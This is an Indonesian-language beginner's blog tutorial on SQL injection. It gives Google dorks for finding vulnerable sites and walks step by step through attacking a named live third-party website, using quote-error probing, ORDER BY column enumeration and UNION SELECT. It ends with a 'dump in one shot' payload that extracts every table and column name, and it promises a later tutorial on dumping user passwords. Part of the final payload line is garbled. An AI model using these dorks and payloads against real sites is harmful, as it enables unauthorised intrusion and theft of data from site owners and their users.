Tutorial SQL Injection Pemula (With Dios)
April 01, 2022
Hello Guyss....
Assalamualaikum,, Jadi disini gua bakal berbagi ilmu sedikit ke kalian tentang SQL Injetion
Nahh jadi apa itu SQL Injection?
Jadi SQL Injection adalah teknik mengeksploitasi web aplikasi yang didalam nya menggukan database untuk penyimpanan data
nah daripada banyak bacot lagi mending langsung ke tutorial nya aja
oke yang diperlukan adalah :
1. Browser
2. Dork
3. Dios SQL (buat yang ga punya ntar gue kasih)
4. dan segelas kopi tentu nya
oke langsung aja kita ke tutorial nyaa...
Dork :
- inurl:"php?id=" intext:"news"
- inurl:"php?id=" intext:"gallery"
- inurl:"php?id=" intext:"product"
- inurl:view.php?cid=
dork nya bisa kalian racik lagi sendiri
Nahh disini gue bakal pakai web
Live Target : https://ieitvm.org/news-detail.php?id=9
Nahh pertama - tama kita cek dulu web ini vuln SQL Injection apa ngga...
Cara cekk nya pakai string ( ' ) atau tanda petik
nah jadi kaya gitu
Nahh yang awal page web nya sebelum dikasih string ( ' ) aman - aman aja bakal eror atau ngeblank
Nahh jadi bakal eror gituu, ngomong² tanda kalau web itu vuln SQL Injection biasa nya bakal blank, ada tulisan " Your have an eror in SQL syntax ... ".
nah kalau udah eror coba kita kembaliin web nya, dengan cara....
+order+by1--+-
nah jadi pakai ituu kita coba langsung ke web nya
nahh step selanjut nya tinggal lu cari aja column yang bakal bikin web nya eror....
https://ieitvm.org/news-detail.php?id=9+order+by+6--+- ~> aman
https://ieitvm.org/news-detail.php?id=9+order+by+7--+- ~> aman
https://ieitvm.org/news-detail.php?id=9+order+by+8--+- ~> eror
nahh jadi di web ini eror di nomer 8, tinggal kita tampilin nomer togel nya
+union+select+1,2,3,4,5,6,7--+-
nomer column nya sesuai dengan nomer pada web yang sebelum column nya eror... maksudnya? nah jadi maksudnya itu kayak web diatas eror nya di 8 dan nomer 7 aman jadi kalian ketik nya sampai nomer 7 aja..
kok ga muncul nomer togel nya bang?kalau ga muncul tinggal lu tambahin aja string ( - ) didepan param web nya
Nahh udah muncul deh nomer togel nya tinggal kita print dios nya
Dios : concat(Nick Lu,%27<br>%27,%27<img src ="Link Gambar"%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
Nick sama gambar bisa kalian ganti sendiri dan buat nick nya kalian hex dulu
Kalau udah dibuat dios nya tinggal print dios nya dehh
,version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7--+-){kind=link}
Nahh ke print dehh dios nya, buat tutorial dump user/pw nya gue buat next time aje soal nya udeh banyak...
Sekian tutorial SQL Injection dari gua, kalau ada salah kata mohon dimaapkeunn semoga bermanfaat :-)